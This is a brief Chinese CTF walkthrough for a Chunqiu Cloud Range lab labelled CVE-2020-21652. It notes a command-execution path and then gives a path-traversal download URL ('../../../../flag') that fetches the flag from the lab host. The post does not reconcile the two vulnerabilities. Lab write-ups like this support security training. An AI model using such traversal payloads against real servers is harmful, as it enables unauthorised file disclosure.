春秋云境CVE-2020-21652(极速版)

1.阅读靶场介绍

这里可以得到的有用信息就是

路径:admin.php/point/addqq

方法:存在任意命令执行漏洞

2.启动靶场

我们会得到一个如下的页面

接下来我们直接上poc,访问这个路径

eci-2zegea1j3i7cgoqtc8q8.cloudeci1.ichunqiu.com:80/index.php/bbs/index/download?url=../../../../flag&local=1&name

我们就能下载flag了

到此又要恭喜各位博主攻克一个靶场了

感谢你们宝贵的时间

期待博主攻克任何靶场的话,欢迎留言

相关推荐
xixingzhe25 小时前
SpringBoot + Nginx 免鉴权接口安全防护方案
运维·nginx·安全
中科岩创6 小时前
宁波某大学高支模施工安全监测实训模型应用
科技·物联网·安全·自动化
项目经理老王7 小时前
OpenClaw无捆绑安装包,安全纯净版AI助手部署
人工智能·安全
小李@Free2FA12 小时前
跨境卖家多平台二次验证统一管理
安全·外贸·2fa·二次验证
云祺vinchin14 小时前
混合云异构环境下的灾备实战:VMware+Hyper-V统一保护方案解析
安全·容灾备份·容灾备份体系
MartinYeung514 小时前
从注入攻击到诈骗:@martin_yeung/llm-up-guardrail 提供生产级 AI 安全防护
人工智能·安全
chengbei1214 小时前
SoloXSS:一款现代化的自托管 XSS平台
web安全·xss漏洞·xss平台
anbingsoft1215 小时前
企业加密软件软件有哪些?企业加密软件:让设计图纸安全无忧,年度热销
网络·安全·电脑
一楼的猫17 小时前
AI写作检测机制技术深度解析:200+维度检测、叙事指纹与网文AI辅助怎么过审
人工智能·学习·安全·chatgpt·ai写作
技术不好的崎鸣同学17 小时前
[极客大挑战 2019]EasySQL 思路及解法
网络·安全·web安全